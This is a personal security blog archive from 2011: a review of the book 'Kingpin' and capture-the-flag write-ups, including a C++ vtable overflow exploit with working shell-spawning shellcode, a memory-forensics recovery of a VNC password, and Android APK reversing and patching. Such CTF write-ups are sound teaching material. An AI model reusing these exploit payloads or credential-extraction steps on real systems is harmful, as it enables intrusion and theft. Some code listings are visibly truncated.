mercredi 27 avril 2011

[Book] Kingpin: How One Hacker Took Over The Billion-Dollar CyberCrime Underground


For once in a while, why not write in English?
Afterall, you are around 20-30% of English speaking people reading up my blog, it would not be fair not to speak about this great book and not share it more.

Small book presentation

This book is written by Kevin Poulsen a former hacker and now senior editor in Wired. He is the creator and maintainer of the "Threat Level" section in Wired. He is mostly known for his various hacks such as the 911 red Ferrari hack. Now, he is one of the most recognized cyber crime journalists out there.

That is the story of a once recognized computer security specialist who turned into a super villain. "One day a hacker, always a hacker" could not describe better this story. This is a great journey in the underworld while staying safely at our place.


Max Butler, grew up in Meridian, Idaho with his parents until they got divorced in his fourteenth year. It devastated him, he wound up living in Meridian with his mother and his younger sister Lisa. His passion of  computers started out when he was young, his father who ran a computer store influenced him, it led him to write BASIC programs at the age of 8.

In his high school years, he began dating a girl named "Amy", they got pretty serious with high school ending. He was devoted to her and chose to go to the Boise university, the same as hers. From there, their adventure in the online world got more mixed up as TinyMUDs was becoming addictive. Jealousy led him to make threats to her and wound him up in prison for "deadly weapons": his hands ...

5 years later, he were to be welcomed by his old friends (Tim Spencer and the others from his highschool days) in the "The Hungry Programmers" house. From this day onward he were to get jobs from his buddies and recreationnal hacker otherwise. His hacking led him to get a lawsuit by "Software Publishers Association" and be featured in Wired, this whole affair introduced Max to the FBI. New assignments and a new life yet to begin.

Thus began "the white hat years", but still a recreationnal hacker, A new home, a new job, the only thing missing was someone to share it with, he met his wife Kimi Winters at a rave party. A home, a devoted wife, beloved friends and a good career perspective. He would waste it in some weeks.
In 1999, a BIND buffer overflow vulnerability was uncovered.
bcopy(fname, anbuf, alen = (char *)*cpp - fname);
It was something huge, it could have been devastating. He was decided to fix it, he wrote a worm which would propagate itself through vulnerable systems to patch them and backdoor them. All the machines were now fixed and insecure to only one hacker: "Max Vision". He got tolerated by his FBI colleagues under the condition he would collaborate with the FBI once again, he failed to do so, busted was it.
His acquired reputation in the white hat world through and arachNIDS would have ensured him a a brilliant career and life. He was to forget that he had a pending judgement, it got him 18 months in prison and unemployability, another injustice for him did he think. Nobody wanted to hire him anymore ... A slow descent to the underground was to begin.

In the joint, he met with Jeff Norminton who would later introduce him to Chris Aragon, his partner in crime. From there, it was just a matter of time for escalation. From ShadowCrew to CarderPlanet, he was hacking fraudsters from all over the world. Counterfeiting credit cards was their business, it was juicy, but not enough.

The law enforcement services, had their tentacles in the underground forums, ShadowCrew and CarderPlanet for some time. On July 28, 2004, King Arthur decided it was time to close CarderPlanet. ShadowCrew were to follow, 26 October 2004, the USS, FBI, took it down with its administrators and others as well. The underground was crushed, paranoid and homeless, nobody would think of a board for a long time ... or so they thought.

Max and his partner, Chris Aragon, were suspicious, not trusting any existing smaller criminal forums. Max decided, the best would be a site were he could do business safely without it being corrupted or full of feds. Max as IceMan, launched CardersMarket in late 2005, a new home for IceMan criminal activity was born.

After some months of activity, his forum was up and running, it was not enough. The carding community needed to be reunited in the post-ShadowCrew carding scene. He would provide that by taking over DarkMarket, ScandinavianCarding, the Vouched, CardingWorld and TalkCash. Only DarkMarket survived assimilitation thanks to its backup and the Russian one due to language barriers.

One Hacker to rule them all, One Hacker to find them,
One Hacker to bring them all and in the darkness bind them

During that time, Master Splyntr, a FBI UnderCover, would take over DarkMarket. He managed to uncover carders identities, arrest them and prevent fraud through the insider information he had now access to.

From this point onward, it was only a matter of time for important ring leaders to fall one after another. On September 5, 2007, Max got busted at his appartment during a nap he'd taken. He did not managed to shut down his computer, two weeks later the CERT team decrypted his encrypted data (with DriveCrypt), 1.8 millions credit cards dumps were found. At the same period, some Albert Gonzalez, an ancient ShadowCrew informant for the FBI, was busted for TJ MAX and others for 45.6 millions dumps.

One hacker owning thousands and thousands of people in the USA. Think about it, we only see super heroes and super villains in comics ... what if they really existed?

What's next?

This book was mostly an eye opener on what existed and what methods cyber crooks and cyber criminals use to illegally make money. It is scary, it is real and it still have many more years to exist. Seems like security specialist is a future proof job, thanks or due to bank carelessness? Who would still be damn stupid to still use magnetic stripe only cards but banks? No really, it's expensive to change equipment .... but maybe not as much as cyber criminality.

We only scratched the surface of the iceberg, and yet it is profoundly interesting as a subject to study. Cyber-warfare? It has existed for years, but now it is taking bigger and bigger proportions. Would we see another BIND worm attack? We'll see, only time will tell. This is only the beginning, phear. Until then, hack and protect yourself and others.

This book really was enjoyable to read, this is a pure travel in the heart of the 21st century criminality and a sneak peek into cyber crooks mindset. A glimpse at a scary-true underground on the dark and white side of the force. Read it with envy, assimilate it with interest, paranoid they become and shadowy their world is. Enter the underground.

Phrack it, Read it, Enjoy it,



BIND vulnerability
One Hacker's Audacious Plan to Rule the Black Market in Stolen Credit Cards

lundi 25 avril 2011

Plaid Parliament of Pawning CTF: CPP1 in pwnables


Ce week-end s'est déroulé le PPP CTF, je n'ai hélas pas pu y consacrer énormément de temps :(.

J'ai quand même pu toucher à quelques épreuves sympas dont un overflow sur un programme écrit en C++.

Nous avions affaire à un programme vulnérable à un overflow dû à l'usage de sprintf() et nous devions crafter une vtable afin de rediriger le flux d'exécution comme il fallait.

Tout d'abord on va reverser le programme.

Reversing for the better good?

La première routine dans main() est le check du nombre d'arguments.
.text:080487C9 ; =============== S U B R O U T I N E =======================================
.text:080487C9 ; Attributes: noreturn
.text:080487C9 main            proc near               ; DATA XREF: start+17 o
.text:080487C9 nptr            = dword ptr -30h
.text:080487C9 value           = dword ptr -2Ch
.text:080487C9 str             = dword ptr -28h
.text:080487C9 arg_0           = byte ptr  4
.text:080487C9                 lea     ecx, [esp+arg_0]
.text:080487CD                 and     esp, 0FFFFFFF0h
.text:080487D0                 push    dword ptr [ecx-4]
.text:080487D3                 push    ebp
.text:080487D4                 mov     ebp, esp
.text:080487D6                 push    ecx
.text:080487D7                 sub     esp, 24h
.text:080487DA                 mov     [ebp-18h], ecx
.text:080487DD                 mov     eax, [ebp-18h]
.text:080487E0                 cmp     dword ptr [eax], 2
.text:080487E3                 jg      short loc_80487F5
.text:080487E5                 mov     edx, [ebp-18h]
.text:080487E8                 mov     eax, [edx+4]
.text:080487EB                 mov     eax, [eax]
.text:080487ED                 mov     [esp+30h+nptr], eax
.text:080487F0                 call    usage

Nous avons ensuite un appel vers une fonction qui prend le pointeur this en paramètre.
.text:080487F5 ; ---------------------------------------------------------------------------
.text:080487F5 loc_80487F5:                            ; CODE XREF: main+1A j
.text:080487F5                 lea     eax, [ebp-0Ch]
.text:080487F8                 mov     [esp+30h+nptr], eax
.text:080487FB                 call    set_string_wrapper

Cette fonction va initialiser un pointeur de méthode dans l'objet en utilisant le pointeur this passé en paramètre.
.text:08048846 ; =============== S U B R O U T I N E =======================================
.text:08048846 ; Attributes: bp-based frame
.text:08048846 set_string_wrapper proc near            ; CODE XREF: main+32 p
.text:08048846 arg_0           = dword ptr  8
.text:08048846                 push    ebp
.text:08048847                 mov     ebp, esp
.text:08048849                 mov     eax, [ebp+arg_0]
.text:0804884C                 mov     dword ptr [eax], offset offset_show_string
.text:08048852                 pop     ebp
.text:08048853                 retn
.text:08048853 set_string_wrapper endp

Cette pointeur pointe vers l'addresse 0x08048B20 où se trouve l'addresse d'une fonction d'affichage.
.rodata:08048B20 offset_show_string dd offset show_string ; DATA XREF: set_string_wrapper+6

La fonction d'affichage est un simple wrapper pour printf() et prend une chaîne de caractère en paramètre (aucun intérêt à mon goût).
.text:08048854 ; =============== S U B R O U T I N E =======================================
.text:08048854 ; Attributes: bp-based frame
.text:08048854 show_string     proc near               ; DATA XREF: .rodata:offset_show_string o
.text:08048854 str             = dword ptr  0Ch
.text:08048854                 push    ebp
.text:08048855                 mov     ebp, esp
.text:08048857                 sub     esp, 8
.text:0804885A                 mov     eax, [ebp+str]
.text:0804885D                 mov     [esp+4], eax
.text:08048861                 mov     dword ptr [esp], offset aS ; "%s"
.text:08048868                 call    _printf
.text:0804886D                 leave
.text:0804886E                 retn
.text:0804886E show_string     endp

Au final, set_string_wrapper() va faire la chose suivante:
this->ptr = 0x08048B20
*0x08048B20 = show_string
ce qui donne donc this->ptr->show_string().

Maintenant revenons à la suite de notre fonction main(). Celle-ci va ensuite faire un
appel à atoi() pour convertir le argv[2] en entier pour ensuite appeler vuln() en passant
argv[2] et argv[1].
.text:08048800                 mov     edx, [ebp-18h]
.text:08048803                 mov     eax, [edx+4]
.text:08048806                 add     eax, 8
.text:08048809                 mov     eax, [eax]
.text:0804880B                 mov     [esp+30h+nptr], eax ; nptr
.text:0804880E                 call    _atoi
.text:08048813                 mov     [ebp-8], eax
.text:08048816                 mov     edx, [ebp-18h]
.text:08048819                 mov     eax, [edx+4]
.text:0804881C                 add     eax, 4
.text:0804881F                 mov     eax, [eax]
.text:08048821                 mov     [esp+30h+str], eax
.text:08048825                 mov     eax, [ebp-8]
.text:08048828                 mov     [esp+30h+value], eax
.text:0804882C                 lea     eax, [ebp-0Ch]
.text:0804882F                 mov     [esp+30h+nptr], eax
.text:08048832                 call    vuln
.text:08048832 main            endp
.text:08048837 ; ---------------------------------------------------------------------------
.text:08048837                 mov     eax, 0
.text:0804883C                 add     esp, 24h
.text:0804883F                 pop     ecx
.text:08048840                 pop     ebp
.text:08048841                 lea     esp, [ecx-4]
.text:08048844                 retn

Ca nous donne donc:
vuln(this, atoi(argv[2]), argv[1]);

Regardons ce qui se passe dans vuln(). On repère 2 fonction intéressantes: sprintf() et memcpy() qui peuvent être susceptible à des overflows si des arguments sont controlés.
.text:0804896C ; =============== S U B R O U T I N E =======================================
.text:0804896C ; Attributes: noreturn bp-based frame
.text:0804896C vuln            proc near               ; CODE XREF: main+69 p
.text:0804896C buf             = byte ptr -32h
.text:0804896C this            = dword ptr  8
.text:0804896C value           = dword ptr  0Ch
.text:0804896C str             = dword ptr  10h
.text:0804896C                 push    ebp
.text:0804896D                 mov     ebp, esp
.text:0804896F                 sub     esp, 58h
.text:08048972                 mov     eax, [ebp+value]
.text:08048975                 mov     [esp+0Ch], eax
.text:08048979                 mov     eax, [ebp+str]
.text:0804897C                 mov     [esp+8], eax
.text:08048980                 mov     dword ptr [esp+4], offset aUploading___SD ; "Uploading... [%s]: %d pts\n"
.text:08048988                 lea     eax, [ebp+buf]
.text:0804898B                 mov     [esp], eax      ; s
.text:0804898E                 call    _sprintf
.text:08048993                 mov     dword ptr [esp+8], 32h ; n
.text:0804899B                 lea     eax, [ebp+buf]
.text:0804899E                 mov     [esp+4], eax    ; buf
.text:080489A2                 mov     dword ptr [esp], offset s ; dest
.text:080489A9                 call    _memcpy
.text:080489AE                 mov     eax, [ebp+this]
.text:080489B1                 mov     eax, [eax]
.text:080489B3                 mov     edx, [eax]
.text:080489B5                 mov     dword ptr [esp+4], offset s
.text:080489BD                 mov     eax, [ebp+this]
.text:080489C0                 mov     [esp], eax
.text:080489C3                 call    edx
.text:080489C5                 mov     eax, [ebp+this]
.text:080489C8                 mov     [esp], eax
.text:080489CB                 call    send_points
.text:080489CB vuln            endp
.text:080489D0 ; ---------------------------------------------------------------------------
.text:080489D0                 leave
.text:080489D1                 retn

On a les choses suivantes:
sprintf(buf, "Uploading... [%s]: %d pts\n", argv[1], atoi(argv[2]));
memcpy(s, buf, 50);
this->ptr->fct(s); // avec fct normalement égal à l'adresse de show_string()

On a les variables suivantes:
buf = buffer local de 50 octets
s = buffer global

Donc la vulnérabilitée se trouve au niveau du sprintf() qui overflow sur une partie de la stack et qui permet donc de re-écrire en autre this.
On va re-écrire this et pouvoir se crafter une vtable dans le buffer global, ça permet de bypasser l'ASLR sans souci.

Je parle bien entendu de cette partie:
.text:080489AE                 mov     eax, [ebp+this]
.text:080489B1                 mov     eax, [eax]
.text:080489B3                 mov     edx, [eax]
.text:080489C3                 call    edx

Exploitation in progress ...

On va chercher à connaître l'offset après lequel on re-écrit this.
$ ssh's password: 
Linux a5 2.6.32-5-686-bigmem #1 SMP Tue Mar 8 22:14:55 UTC 2011 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
cpp1_135@a5:~$ ls='ls --color -lash'
cpp1_135@a5:~$ cd /opt/pctf/cpp1/
cpp1_135@a5:/opt/pctf/cpp1$ ls
total 20K
4.0K drwxr-x--- 2 root cpp1users 4.0K Apr 20 20:48 .
4.0K drwxr-xr-x 9 root root      4.0K Apr 21 12:24 ..
8.0K -rwxr-sr-x 1 root cpp1key   4.9K Apr 20 20:44 first_cpp
4.0K -rw-r----- 1 root cpp1key     27 Apr 15 19:35 key
cpp1_135@a5:/opt/pctf/cpp1$ gdb -q ./first_cpp 
Reading symbols from /opt/pctf/cpp1/first_cpp...(no debugging symbols found)...done.
(gdb) r `printf "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9"` 10
Starting program: /opt/pctf/cpp1/first_cpp `printf "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9"` 10

Program received signal SIGSEGV, Segmentation fault.
0x080489b1 in ?? ()
(gdb) i r
eax            0x35624134 895631668
ecx            0x0 0
edx            0x0 0
ebx            0xb775eff4 -1217007628
esp            0xbfed57f0 0xbfed57f0
ebp            0xbfed5848 0xbfed5848
esi            0x0 0
edi            0x0 0
eip            0x80489b1 0x80489b1
eflags         0x210207 [ CF PF IF RF ID ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0 0
gs             0x33 51
(gdb) x/10i $eip
0x80489b1: mov    (%eax),%eax
0x80489b3: mov    (%eax),%edx
0x80489b5: movl   $0x8049dc0,0x4(%esp)
0x80489bd: mov    0x8(%ebp),%eax
0x80489c0: mov    %eax,(%esp)
0x80489c3: call   *%edx
0x80489c5: mov    0x8(%ebp),%eax
0x80489c8: mov    %eax,(%esp)
0x80489cb: call   0x8048870
0x80489d0: leave  

this pointant vers une valeur invalide, on trigger notre segfault :).

Avec le pattern on obtient vite l'offset:
~/repos/msf3$ tools/pattern_offset.rb `printf "\x34\x41\x62\x35"`

On doit d'abord faire de petits calculs d'offset pour savoir où se trouve notre chaîne:
0x08049DC0 => addresse du buffer global contenant notre chaîne entière
// addresse de la string qu'on soumet à l'application
// strlen("Uploading...") == 14
0x08049DC0 + 14 = 0x08049DCE
// addresse où se trouve notre this
0x08049DCE + 44 = 0x08049DFA

On va maintenant pouvoir pawn le challenge comme il faut, pour celà, je vais vous montrer 2 patterns d'attaques j'ai utilisé pour ce faire.

On a this->ptr->fct(), et on contrôle this (et donc les autres pointeurs).
On peut exploiter le challenge en utilisant le code suivante:
[jump code (7 bytes)] [ ptr (4bytes)  ] [ fct ptr (4 bytes) ] [ junk (29 bytes) ] [ this (4bytes) ] [ payload ]
                    44 bytes                                                      |    4 bytes     |   ?
this = 0x08049dd5 = address de ptr
ptr  = 0x08049dd9
fct  = 0x08049dce

Je vais utiliser la payload suivante (bash -p):

./first_cpp `python -c 'print "\x89\xe0\x83\xc0\x78\xff\xe0" + "\xd9\x9d\x04\x08" + "\xce\x9d\x04\x08" + "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa" + "\xd5\x9d\x04\x08" + "\x90" * 128 + "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"'` 10

Le jump code est le suivante:

mov eax, esp
add eax, 120
jmp eax

Avec ce pattern on saute sur la stack pour exécuter notre code.

Je voulais un pattern un peu plus propre n'ayant pas à overflow trop la stack.
Pattern plus propre permettant d'avoir tout dans le buffer global:
[ ptr (4bytes)  ] [ fct ptr (4 bytes) ] [ payload1 (23 bytes ] [ junk (5 bytes)]
this = 0x08049dce = address of ptr
ptr  = 0x08049dd2
fct  = 0x08049dd6

En vrai en stack on a la chose suivante:
[ ptr (4bytes)  ] [ fct ptr (4 bytes) ] [ payload1 (23 bytes ] [ junk (13 bytes)] [ this (4bytes) ] [ payload2 ]
this = 0x08049dce = address of ptr
ptr  = 0x08049dd2
fct  = 0x08049dd6

$ ./first_cpp `python -c 'print "\xd2\x9d\x04\x08" + "\xd6\x9d\x04\x08" + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x90" * 13 + "\xce\x9d\x04\x08"'` 10
$ cat key

Dans le buffer global on a ainsi l'équivalent suivant:
global_buffer = "Uploading..." + "\xd2\x9d\x04\x08" + "\xd6\x9d\x04\x08" + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x90" * 5

Et voilà, pawned,


On a pu voir que la mauvaise utilisation de fonctions dangereuses et l'utilisation de variables globales peut rendre une exploitation de vtable et vptr plutôt possible :).

J'espère que ça vous a plu :),


lundi 4 avril 2011

Prequals NDH2011: Forensic100 (Windows Memory Analysis)


Today we are going to look after the forensic 100 challenge of the prequals :).
We were offered a memory dump to analyze.


The needed tools for the analysis are basically the following:
Volatility: Windows Memory Analysis
VolReg: Volatility plugin for registry analysis
VNC Password Dumper: VNC Password decrypter


We first need to know what operating system dump we are analysing:
$ python ./volatility ident -f ../Desktop/dump.raw 
              Image Name: ../Desktop/dump.raw
              Image Type: Service Pack 2
                 VM Type: pae
                     DTB: 0xae2000
                Datetime: Thu Mar 10 14:28:56 2011

Ok the dump is recognized to be a Windows XP SP2 RAM dump (you can check it using strings ;)).
We are after a VNC password but we would like to know which VNC software is used:
$ python ./volatility pslist -f ../Desktop/dump.raw 
Name                 Pid    PPid   Thds   Hnds   Time  
System               4      0      53     258    Thu Jan 01 00:00:00 1970  
smss.exe             544    4      3      21     Thu Mar 10 13:02:27 2011  
csrss.exe            608    544    11     319    Thu Mar 10 13:02:29 2011  
winlogon.exe         632    544    19     440    Thu Mar 10 13:02:29 2011  
services.exe         684    632    16     338    Thu Mar 10 13:02:30 2011  
lsass.exe            696    632    19     328    Thu Mar 10 13:02:30 2011  
svchost.exe          860    684    17     210    Thu Mar 10 13:02:31 2011  
svchost.exe          928    684    9      232    Thu Mar 10 13:02:31 2011  
svchost.exe          1020   684    59     1148   Thu Mar 10 13:02:31 2011  
svchost.exe          1064   684    4      74     Thu Mar 10 13:02:31 2011  
svchost.exe          1300   684    14     203    Thu Mar 10 13:02:33 2011  
spoolsv.exe          1472   684    10     108    Thu Mar 10 13:02:34 2011  
explorer.exe         1580   1564   11     446    Thu Mar 10 13:02:34 2011  
ctfmon.exe           1664   1580   1      66     Thu Mar 10 13:02:35 2011  
alg.exe              500    684    6      104    Thu Mar 10 13:02:58 2011  
wscntfy.exe          532    1020   1      36     Thu Mar 10 13:02:59 2011  
winvnc4.exe          1696   684    3      67     Thu Mar 10 13:09:47 2011  
mmc.exe              1512   1580   7      241    Thu Mar 10 13:28:14 2011  
wmiprvse.exe         1460   860    13     204    Thu Mar 10 13:28:33 2011

We now know that WinVNC 4 was used, at this point we can dump the memory of the process and the executable itself. But no point, we need to know the registry key under which the password might be stored:
$ strings -e l ../Desktop/dump.raw | grep -i vnc | grep -i hkey

Now on with the registry analysis, we run hivescan to get hive offsets.
$ python ./volatility hivescan -f ../Desktop/dump.raw Offset          (hex)          
44759904        0x2aafb60      
44765192        0x2ab1008      
47600264        0x2d65288      
49462112        0x2f2bb60      
57268056        0x369d758      
117583880       0x7023008      
117586784       0x7023b60      
138480480       0x8410b60      
140337160       0x85d6008      
144967512       0x8a40758      
145000296       0x8a48768      
146788360       0x8bfd008      
167239688       0x9f7e008      

We use the first offset with hivelist to show where hives are located at.
$ python ./volatility hivelist -f ../Desktop/dump.raw -o 0x2aafb60
Address      Name
0xe1809008   \Documents and Settings\eleve\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1986008   \Documents and Settings\eleve\NTUSER.DAT
0xe17a9768   \Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe179b758   \Documents and Settings\LocalService\NTUSER.DAT
0xe1770008   \Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe175fb60   \Documents and Settings\NetworkService\NTUSER.DAT
0xe13ffb60   \WINDOWS\system32\config\software
0xe14ab008   \WINDOWS\system32\config\default
0xe14abb60   \WINDOWS\system32\config\SAM
0xe14e4758   \WINDOWS\system32\config\SECURITY
0xe12e8288   [no name]
0xe1035b60   \WINDOWS\system32\config\system
0xe102e008   [no name]

Since we now that we are interested by "HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4", we are going to work directly with the SOFTWARE hive.
$ python ./volatility printkey -f ../Desktop/dump.raw -o 0xe13ffb60 "RealVNC\\WinVNC4"
Key name: WinVNC4 (Stable)
Last updated: Thu Mar 10 13:10:51 2011


REG_BINARY Password   : 
0000   DA 6E 31 84 95 77 AD 6B                            .n1..w.k
REG_SZ    SecurityTypes : VncAuth (Stable)
REG_SZ    ReverseSecurityTypes : None (Stable)
REG_DWORD QueryConnect : 0 (Stable)
REG_DWORD QueryOnlyIfLoggedOn : 0 (Stable)

Here we are, we got the encrypted form of the password, now is time to decrypt it using vncpwdump:

$ wine vncdump/vncpwdump.exe -k "DA6E31849577AD6B"

VNCPwdump v.1.0.6 by
Password: secretpq

As a bonus, we can also decrypt it using Cain&Abel:

Hope you liked it,


- Plugins: Volatility plugins
- Tool: Memoryze
- Write-up: Forensic100

Prequals NDH2011: RCE200 (Android)

On va commencer par l'épreuve de reversing Android.
C'était la première fois que je jouais avec de l'Android, seems fun :).


On avait à disposition une simple application dans laquelle il nous fallait parler.

Au lancement de l'application, nous somme accueillis par le screen suivant (sans le petit texte que j'ai ajouté :)):

 Il fallait prononcer un mot correctement pour obtenir le flag:
Non ce n'est pas le flag :).
J'ai pas réussi à l'obtenir par ce biais.

Pour ce challenge, plusieurs tools étaient disponibles, tel que Dex2Jar ou APKTool par exemple.
Ils ont plusieurs avantages et inconvénients, Dex2Jar nous sort du bytecode Java qu'on peut décompiler avec JD mais nous n'avons pas la possibilitée de facilement modifier l'APK.
APKTool nous permet de modifier l'APK et de le reconstruire correctement, par contre pas forcément évident à trouver la routine qui nous intéresse (à coup de grep ça peut se faire :)).

J'ai fais usage de la premire méthode pour analyser le programme: RCE200.apk
jd-gui RCE200.apk.dex2jar.jar

Et le deuxième tool pour ajouter mon texte et patcher une condition afin de montrer un hash tous le temps (normalement il doit y avoir un affichage que lorsque le bon mot est prononcé).
Je me suis donc fais 2 helpers pour manipuler facilement le dump smali obtenu:

cd apktool
java -jar apktool.jar d ../$1
mv `echo $1 | cut -d '.' -f 1` ../

# if android key does not exist, we create one
if [ ! -f ~/keystore-android ]
    keytool -genkeypair -v -keystore ~/keystore-android -alias rce200 -keyalg RSA -keysize 2048

if [ -f $1.aligned.apk ]
    rm $1.aligned.apk

cd apktool
export PATH=./:$PATH
java -jar apktool.jar b ../$1
cd ../
jarsigner -verbose -keystore ~/keystore-android $1/dist/$1.apk rce200
cp $1/dist/$1.apk ./$1.rebuilt.apk
./zipalign -v 4 $1.rebuilt.apk $1.aligned.apk
rm $1.rebuilt.apk

Let's reverse it!

Après avoir transformer notre .apk and .jar, nous ouvrons celui-ci avec jd-gui et on se retrouve avec 4 sources .java:,, et

Le premier fichier (

package ndh.prequals.rce;

import android.content.Intent;
import android.os.Build;
import android.os.Bundle;
import android.widget.Button;
import android.widget.TextView;
import java.util.ArrayList;
import java.util.List;

public class ReverseMe extends Activity
  private a a = null;
  private TextView b = null;

  protected void onActivityResult(int paramInt1, int paramInt2, Intent paramIntent)
    if ((paramInt1 == 1234) && (paramInt2 == -1))
      ArrayList localArrayList = paramIntent.getStringArrayListExtra("android.speech.extra.RESULTS");
      if ((!localArrayList.isEmpty()) && (a.b((String)localArrayList.get(0))))
        TextView localTextView = this.b;
        String str = a.a((String)localArrayList.get(0));
    super.onActivityResult(paramInt1, paramInt2, paramIntent);

  public void onCreate(Bundle paramBundle)
    Button localButton = (Button)findViewById(2131034114);
    TextView localTextView = (TextView)findViewById(2131034113);
    this.b = localTextView;
    PackageManager localPackageManager = getPackageManager();
    String str1 = c.d();
    Intent localIntent = new Intent(str1);
    if (localPackageManager.queryIntentActivities(localIntent, 0).size() != 0)
      String str2 = c.b();
      String str3 = Build.PRODUCT;
      if (!str2.equals(str3))
        b localb = new b(this);
    a locala = new a();
    this.a = locala;

onCreate() va mettre en place les différents éléments de l'application à sa création comme l'image, le texte et le button.
onActivityResult() est le handler qui va afficher notre flag si nous prononçons le bon mot. (Patchez la condition pour toujours avoir un hash d'affiché :)).

Le deuxième fichier (

package ndh.prequals.rce;

import android.os.Build;

public final class a
  public static String a(String paramString)
      MessageDigest localMessageDigest = MessageDigest.getInstance(c.e());
      byte[] arrayOfByte = paramString.getBytes();
      localObject1 = localMessageDigest.digest();
      StringBuffer localStringBuffer1 = new StringBuffer();
      int i = 0;
      int j = localObject1.length;
      if (i >= j)
        localObject1 = localStringBuffer1.toString();
        return localObject1;
      String str;
      for (Object localObject2 = Integer.toHexString(localObject1[i] & 0xFF); ; localObject2 = str)
        if (((String)localObject2).length() >= 2)
          StringBuffer localStringBuffer2 = localStringBuffer1.append((String)localObject2);
          i += 1;
        str = "0" + (String)localObject2;
    catch (NoSuchAlgorithmException localNoSuchAlgorithmException)
      while (true)
        Object localObject1 = null;

  public static boolean b(String paramString)
      MessageDigest localMessageDigest = MessageDigest.getInstance(c.c());
      byte[] arrayOfByte1 = paramString.getBytes();
      byte[] arrayOfByte2 = localMessageDigest.digest();
      StringBuffer localStringBuffer1 = new StringBuffer();
      String str1 = c.b();
      String str2 = Build.PRODUCT;
      if (str1.equals(str2))
        StringBuffer localStringBuffer2 = localStringBuffer1.append(65);
      int i = 0;
      int j = arrayOfByte2.length;
      if (i >= j)
        String str3 = localStringBuffer1.toString();
        String str4 = c.a();
        bool = str3.equals(str4);
        return bool;
      String str5;
      for (Object localObject = Integer.toHexString(bool[i] & 0xFF); ; localObject = str5)
        if (((String)localObject).length() >= 2)
          StringBuffer localStringBuffer3 = localStringBuffer1.append((String)localObject);
          i += 1;
        str5 = "0" + (String)localObject;
    catch (NoSuchAlgorithmException localNoSuchAlgorithmException)
      while (true)
        boolean bool = false;

La méthode a() nous renvoi le hash sha1 de la chaine qu'on met en paramètre et b() nous renvoi un hash MD5.

Le troisième fichier (
package ndh.prequals.rce;

import android.content.Intent;
import android.view.View;
import android.view.View.OnClickListener;

final class b
  implements View.OnClickListener
  b(ReverseMe paramReverseMe)

  public final void onClick(View paramView)
    ReverseMe localReverseMe = this.a;
    if (paramView.getId() == 2131034114)
      String str = c.d();
      Intent localIntent1 = new Intent(str);
      Intent localIntent2 = localIntent1.putExtra("android.speech.extra.LANGUAGE_MODEL", "free_form");
      Intent localIntent3 = localIntent1.putExtra("android.speech.extra.PROMPT", "Enter password");
      localReverseMe.startActivityForResult(localIntent1, 1234);

Cette classe a une unique méthode qui va lancer la boîte de dialogue de reconnaissance vocale.

Le dernier fichier (
package ndh.prequals.rce;

public final class c
  private static byte[] a = { 90, 5, 88, 88, 13, 13, 90, 90, 10, 4, 9, 11, 93, 90, 11, 15, 93, 95, 5, 93, 5, 8, 8, 88, 90, 95, 9, 14, 90, 8, 13, 94 };
  private static byte[] b = { 91, 83, 83, 91, 80, 89, 99, 79, 88, 87 };
  private static byte[] c = { 113, 120, 9 };
  private static byte[] d = { 93, 82, 88, 78, 83, 85, 88, 18, 79, 76, 89, 89, 95, 84, 18, 93, 95, 72, 85, 83, 82, 18, 110, 121, 127, 115, 123, 114, 117, 102, 121, 99, 111, 108, 121, 121, 127, 116 };
  private static byte[] e = { 111, 116, 125, 17, 13 };

  public static String a()
    return a(a);

  private static String a(byte[] paramArrayOfByte)
    byte[] arrayOfByte = new byte[paramArrayOfByte.length];
    int i = 0;
    while (true)
      int j = paramArrayOfByte.length;
      if (i >= j)
        return new String(arrayOfByte);
      int k = (byte)(paramArrayOfByte[i] ^ 0x3C);
      arrayOfByte[i] = k;
      i += 1;

  public static String b()
    return a(b);

  public static String c()
    return a(c);

  public static String d()
    return a(d);

  public static String e()
    return a(e);
Ici nous avons affaire à plusieurs chaînes de caractères obfusquée par un XORing avec une clé de 0x3C.

J'ai coder un rapide utilitaire pour me dé-obfusquer ces chaînes:
// author : m_101
// licence: beerware
// year   : 2011
// ctf    : ndh2011 prequals

#include <stdio.h>
#include <stdlib.h>

void decrypt(unsigned char *encrypted) {
    size_t idxEnc;
    int c;

    printf("Decrypted: '");
    for (idxEnc = 0; encrypted[idxEnc] != 0; idxEnc++) {
        c = encrypted[idxEnc] ^ 0x3c;
        printf("%c", c); 

int main (int argc, char *argv[]) {
    unsigned char a[] = {
        90, 5, 88, 88, 13, 13, 90, 90,
        10, 4, 9, 11, 93, 90, 11, 15,
        93, 95, 5, 93, 5, 8, 8, 88,
        90, 95, 9, 14, 90, 8, 13, 94,
    unsigned char b[] = { 91, 83, 83, 91, 80, 89, 99, 79, 88, 87 };
    unsigned char c[] = { 113, 120, 9 };
    unsigned char d[] = {
        93, 82, 88, 78, 83, 85, 88, 18,
        79, 76, 89, 89, 95, 84, 18, 93,
        95, 72, 85, 83, 82, 18, 110, 121,
        127, 115, 123, 114, 117, 102, 121, 99,
        111, 108, 121, 121, 127, 116,
    unsigned char e[] = { 111, 116, 125, 17, 13, 0 };


    return 0;

Vous obtenez ceci:
$ ./decode
Decrypted: 'f9dd11ff6857af73ac9a944dfc52f41b'
